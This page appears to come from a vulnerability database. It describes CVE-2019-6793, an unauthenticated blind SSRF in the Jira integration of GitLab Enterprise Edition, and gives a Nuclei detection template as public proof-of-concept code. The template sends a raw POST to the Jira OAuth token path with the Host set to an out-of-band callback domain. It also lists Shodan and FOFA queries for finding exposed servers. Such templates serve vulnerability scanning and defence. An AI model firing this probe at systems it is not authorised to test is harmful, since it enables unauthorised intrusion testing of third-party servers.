漏洞描述
An issue was discovered in GitLab Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. The Jira integration feature is vulnerable to an unauthenticated blind SSRF issue.
CVE-2019-6793: GitLab Enterprise Edition - Server-Side Request Forgery
PoC代码[已公开]
id: CVE-2019-6793
info:
name: GitLab Enterprise Edition - Server-Side Request Forgery
author: ritikchaddha
severity: high
description: |
An issue was discovered in GitLab Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. The Jira integration feature is vulnerable to an unauthenticated blind SSRF issue.
reference:
- https://gitlab.com/gitlab-org/gitlab-foss/-/issues/50748
- https://nvd.nist.gov/vuln/detail/CVE-2019-6793
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L
cvss-score: 7.0
cve-id: CVE-2019-6793
cwe-id: CWE-918
epss-score: 0.02826
epss-percentile: 0.85661
cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*
metadata:
max-request: 1
vendor: gitlab
product: gitlab
shodan-query: html:"GitLab Enterprise Edition"
fofa-query: body="GitLab Enterprise Edition"
tags: cve,cve2019,gitlab,enterprise,ssrf,blind
http:
- raw:
- |+
POST /-/jira/login/oauth/access_token HTTP/1.1
Host: {{interactsh-url}}
unsafe: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"
- type: word
part: body
words:
- "access_token="
- type: status
status:
- 200
# digest: 490a0046304402205f6ec7521b1cf8ba888bf4e21f01194fcc1547ac9dc92f2069861365a71e12d9022065a9cb79f15e928cb67961d1fb9cfa1f65081f70062173b94e5dfff9cf600e91:922c64590222798bb761d5b6d8e72950